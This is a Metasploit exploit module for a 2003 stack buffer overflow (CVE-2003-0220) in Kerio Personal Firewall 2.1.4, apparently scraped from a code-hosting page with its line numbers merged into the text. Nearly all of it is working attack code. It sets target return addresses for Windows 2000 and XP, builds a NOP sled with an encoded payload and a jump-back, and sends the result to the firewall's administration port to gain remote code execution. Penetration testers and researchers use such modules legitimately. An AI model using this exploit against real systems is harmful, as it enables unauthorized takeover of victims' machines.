Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/firewall/kerio_auth.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Kerio Firewall 2.1.4 Authentication Packet Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in Kerio Personal Firewall15administration authentication process. This module has only been tested16against Kerio Personal Firewall 2 (2.1.4).17},18'Author' => 'MC',19'License' => MSF_LICENSE,20'References' =>21[22['CVE', '2003-0220'],23['OSVDB', '6294'],24['BID', '7180']25],26'DefaultOptions' =>27{28'EXITFUNC' => 'process',29},30'Payload' =>31{32'Space' => 800,33'BadChars' => "\x00",34'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",35},36'Platform' => 'win',37'Targets' =>38[39[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],40[ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ],41[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ],42],43'Privileged' => true,44'DisclosureDate' => '2003-04-28',45'DefaultTarget' => 0))4647register_options(48[49Opt::RPORT(44334)50])51end5253def exploit54connect5556print_status("Trying target #{target.name}...")5758sploit = make_nops(4468) + payload.encoded59sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV')6061sock.put(sploit)62sock.get_once(-1, 3)6364handler65disconnect66end67end686970